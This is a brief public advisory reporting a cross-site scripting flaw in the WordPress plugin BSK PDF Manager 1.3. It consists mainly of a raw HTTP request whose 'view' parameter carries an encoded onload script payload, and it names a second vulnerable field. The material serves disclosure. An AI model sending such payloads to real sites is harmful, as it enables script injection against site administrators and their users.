WordPress BSK PDF Manager 1.3 Cross Site Scripting

`# ==============================================================  
# Title ...| XSS in BSK PDF Manager  
# Version .| bsk-pdf-manager 1.3  
# Date ....| 23.02.2014  
# Found ...| HauntIT Blog  
# Home ....| http://wordpress.org/plugins/  
# ==============================================================  
  
  
# ==============================================================  
# XSS   
  
---<request>---  
POST /k/wordpress/wp-admin/admin.php?page=bsk-pdf-manager&view=addnew HTTP/1.1  
Host: 10.149.14.62  
(...)  
Content-Length: 302  
  
page=bsk-pdf-manager&view='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&cat_title=asdasd&bsk_pdf_manager_action=category_save&bsk_pdf_manager_category_id=-1&bsk_pdf_manager_category_save_oper_nonce=9977a95481&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dbsk-pdf-manager%26view%3Daddnew  
---<request>---  
  
Also vulnerable is 'category->title'.  
  
# ==============================================================  
# More @ http://HauntIT.blogspot.com  
# Thanks! ;)  
# o/   
`